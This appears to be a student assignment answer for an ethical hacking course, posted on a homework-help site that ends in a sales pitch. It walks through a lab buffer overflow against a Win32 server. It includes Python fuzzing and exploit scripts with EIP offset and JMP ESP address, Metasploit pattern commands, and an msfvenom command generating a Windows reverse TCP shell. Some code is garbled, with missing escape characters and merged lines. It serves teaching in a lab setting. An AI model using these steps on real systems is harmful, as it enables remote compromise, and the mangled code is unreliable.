CSI5208 Ethical Hacking and Defence
Task
You are to write a technical outline of how the exploit you developed in the workshop operates, from the initial connection, through to compromise.
Answer
Exploit development is conducted to gaining control over a computer system while taking advantages of the bugs and vulnerability allowing privilege escalation or a denial of service attack. The development process contains several phases and need to complete the previous one to mov
e further.
Initiation phase: the whole development process was conducted on Linux platform. Firstly, Win32 buffer victim virtual machine needs to be opened after opening the Kali virtual machine. These two virtual machines need to be set to NAT networking while checking the iP address of both machines.
Overflow:
#!/usr/bin/python |
import sys |
import os |
import socket |
host = sys.argv[1] |
port = int(sys.argv[2]) |
port = int(sys.argv[2]) # Testing buffer = "x41"*500 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) |
con = s.connect((host, port)) s.send(buffer) s.close() |
In the windows host, immediate debugger needs to open and run the server.exe. the exection process was started by pressing F9 key. Then a python file was created with the name”arrack.py”. Python codes are attached. Then the command “python attack.py IP_ADDRESS 1337”. The IP address is the address of the windows virtual machine. Then we swap to the Windows environment and press shift+F9 to pass the exception to the executable.
We can see that EIP now contains our value, as does EBP. Whilst ESP points to a region of memory which contains our injected value.
Weaponzing the vulnerability:
In this phase, server.exe was restarted by pressing CTRL + F2 within immunity debugger. Then the execution process was initiated by pressing F9. The directory also needs to be change into metasploit by running running cd /usr/share/metasploit-framework/tools/exploit. Run ./pattern_create.rb -l 5000 | nc IP_ADDRESS 1337 within Kali, where IP_ADDRESS is the IP address of the Windows VM. Then press SHIFT +F9 within Immunity debugger to pass the exception. Run “./pattern_offset.rb -l 5000 -q 37694136” within Kali to determine the offset of EIP. Now we must determine an address for code which will jump to ESP.
The attack.py modified as follows:
#!/usr/bin/python
import sys
import os
import socket
host = sys.argv[1]
port = int(sys.argv[2])
# EIP is overwritten at 260 bytes
buffer = "x41"*260
# Overwrite EIP with JMP ESP
buffer += "x78x16xF3x77"
# NOPSLED
buffer += "x90"*128
# Shellcode
buffer +=
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
con = s.connect((host, port))
s.send(buffer)
s.close()
Shellcode
- Enter Kali.
- Run the command msfvenom -p windows/shell/reverse_tcp LHOST=<KALI_IP> -e x86/shikata_ga_nai -b 'x00xffx0ax0bx0d' -i 3 -f pythonwhere <KALI_IP> is the IP address of the Kali virtual machine.
- Modify the attack.py file to include the generated shellcode.
Buy CSI5208 Ethical Hacking and Defence Answers Online
Talk to our expert to get the help with CSI5208 Ethical Hacking and Defence Answers to complete your assessment on time and boost your grades now
The main aim/motive of the management assignment help services is to get connect with a greater number of students, and effectively help, and support them in getting completing their assignments the students also get find this a wonderful opportunity where they could effectively learn more about their topics, as the experts also have the best team members with them in which all the members effectively support each other to get complete their diploma assignments. They complete the assessments of the students in an appropriate manner and deliver them back to the students before the due date of the assignment so that the students could timely submit this, and can score higher marks. The experts of the assignment help services at urgenthomework.com are so much skilled, capable, talented, and experienced in their field of programming homework help writing assignments, so, for this, they can effectively write the best economics assignment help services.